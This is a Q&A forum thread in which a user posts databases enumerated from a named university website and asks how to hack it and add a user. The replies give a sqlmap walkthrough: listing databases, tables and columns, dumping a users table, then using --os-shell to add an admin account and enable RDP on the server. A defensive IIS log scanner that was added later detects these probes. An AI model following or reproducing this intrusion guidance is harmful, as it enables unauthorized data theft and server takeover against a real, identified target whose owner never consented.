
I found some databases on a website, which are as follows:

web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
available databases [17]:
[*] Admission
[*] LIVE_AIOU
[*] master
[*] model
[*] msdb
[*] OBJ
[*] Online-Admission
[*] Pictures
[*] Queries
[*] ReportServer
[*] ReportServerTempDB
[*] Rollnoslips
[*] STATS
[*] tempdb
[*] Tutor_List
[*] Tutors
[*] UMC

Now I would like to know which database is connected to the webpage (www.aiou.edu.pk/Tutorship.asp).

And how will I hack or edit the database, if I want to add a user to the database?

related to an answer for: How to hack DBMS Sql server 2008?
closed with the note: answer selected

.:: Educational Purpose Only ::.

What is sqlmap?

Sqlmap is one of the most popular and powerful SQL injection automation tools out there. Given a vulnerable HTTP request URL, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables, etc. It can even read and write files on the remote file system under certain conditions. Written in Python, it is one of the most powerful hacking tools out there. Sqlmap is the Metasploit of SQL injections.

Vulnerable URL:

http://www.site.com/section.php?id=51

It is prone to SQL injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the URL:

http://www.site.com/section.php?id=51'

Hacking with sqlmap

In the console, try this:

sqlmap -u http://site.com/index.asp?id=765

Discover Databases

Once sqlmap confirms that a remote URL is vulnerable to SQL injection and is exploitable, the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.

$ sqlmap -u "http://www.sitemap.com/section.php?id=51" --dbs

The result should be:

[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: mywebdb
available databases [2]:
[*] information_schema
[*] mywebdb

Find tables in a particular database

Now it's time to find out what tables exist in a particular database. Let's say the database of interest here is 'mywebdb'.

sqlmap -u "http://www.site.com/section.php?id=51" --tables -D mywebdb

The output can be something similar to this:

back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections
........... more tables

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Let's say the table is 'users' and it contains the username and password.

sqlmap -u "http://www.site.com/section.php?id=51" --columns -D mywebdb -T users

The output can be something like this:

[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)
[12:17:45] [INFO] retrieved: name
[12:17:46] [INFO] retrieved: text
[12:17:47] [INFO] retrieved: password
[12:17:48] [INFO] retrieved: text

.......

[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+
So now the columns are clearly visible. Good job!

Get data from a table

Now comes the most interesting part: extracting the data from the table. The command would be:

sqlmap -u "http://www.site.com/section.php?id=51" --dump -D mywebdb -T users

The above command will simply dump the data of the particular table, very much like the mysqldump command.

The output might look similar to this:
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
OK, we did it.
Now you are asking how you will get the exact vulnerable "id=" parameter. Yeah, scan that site in some automated scanner; if it detects a SQL injection error then you will get a vulnerable link. Try on that; I hope this might be enough.
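A defender-side counterpart, added here and not part of any post in this thread: the probes the tutorial above relies on (the stray quote in id=51', boolean payloads such as AND 1=1, and sqlmap's own User-Agent) leave a recognisable trail in IIS W3C logs. The log excerpt, field layout and IP addresses below are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not from the original post): a normal hit, the
# quote probe (id=51'), a boolean payload, and a request with sqlmap's User-Agent.
IIS_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2024-01-10 12:12:58 10.0.0.5 GET /page.asp id=51 203.0.113.7 Mozilla/5.0 200
2024-01-10 12:13:00 10.0.0.5 GET /page.asp id=51%27 203.0.113.7 Mozilla/5.0 500
2024-01-10 12:13:01 10.0.0.5 GET /page.asp id=51+AND+1%3D1 203.0.113.7 Mozilla/5.0 200
2024-01-10 12:13:02 10.0.0.5 GET /page.asp id=51 203.0.113.7 sqlmap/1.7.2#stable+(https://sqlmap.org) 200
2024-01-10 12:14:00 10.0.0.5 GET /about.asp - 198.51.100.9 Mozilla/5.0 200
"""

# Signatures of the probes the tutorial relies on: unbalanced quote, tautologies, enumeration.
SQLI_PATTERN = re.compile(r"'|\b(?:AND|OR)\s+\d+=\d+|\bUNION\b.*\bSELECT\b"
                          r"|\bORDER\s+BY\b|\bWAITFOR\b", re.IGNORECASE)

def parse_w3c(text):
    """Yield one dict per record, naming columns from the #Fields directive."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def flag_record(rec):
    """Return the reasons (possibly none) this request looks like an injection probe."""
    reasons = []
    if unquote_plus(rec.get("cs(User-Agent)", "")).lower().startswith("sqlmap/"):
        reasons.append("sqlmap user-agent")
    query = rec.get("cs-uri-query", "-")
    if query != "-":
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            value = unquote_plus(raw)  # IIS logs %27 for ' and '+' for space
            if SQLI_PATTERN.search(value):
                reasons.append(f"payload in {name}={value}")
    if reasons and rec.get("sc-status") == "500":
        reasons.append("server error on probe")  # the error page the quote test looks for
    return reasons

def scan_log(text):
    """Return (time, client ip, uri stem, reasons) for every flagged request."""
    flagged = ((rec, flag_record(rec)) for rec in parse_w3c(text))
    return [(r["time"], r["c-ip"], r["cs-uri-stem"], why) for r, why in flagged if why]
```

Grouping the hits by client IP and URI stem shows the enumeration burst that --dbs, --tables and --dump produce, which a single-request signature would miss.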

1 Answer

Best answer

That query has already been answered: use the --current-db switch in sqlmap or the select db_name() query.

How to Hack a server through its DB, a.k.a. pwnage

Well, first of all, edit your question and hide the website address, as we do not promote unauthorized hacking (it's baaad).

As you shared a Windows server, although you did not share the connected user, I assume it's a SYSTEM account, which means that it has admin rights on the server, so there is nothing hard now, is it?

Just use the --os-shell switch in sqlmap to get yourself a command console; from there you can add a new user with admin rights, check if RDP is open, and if not, open that, or even spawn a PowerShell (refer to my PowerShell archive of hacks and techniques).

--os-shell: sqlmap will try to get the operating system command shell by exploiting SQL injection.

With the above you can wreak havoc.

Play Safe

When I type ./sqlmap.py ........ it says no such file or directory found; it seems that ./sqlmap.py is not installed??
How will I come to know which page.asp is connected with which database? I want to add some data details in site.com/page.asp?id=555.
So what will I do first to log in to the database? Which thing will allow me to log in to the database, and where can I add my own data in a specified id to edit or add?
When you type ./sqlmap.py and it says no file, OK,

go for => sqlmap -u http://site.com/page.asp?aid=434 --dbs << try this; if it worked then try --current-user --is-dba.
If you want to know which page.asp is connected with the database then scan the full site or server on your b0x. Now lemme explain to you the full tut.
Can you give me your e-mail ID where I can send you all the output data/details?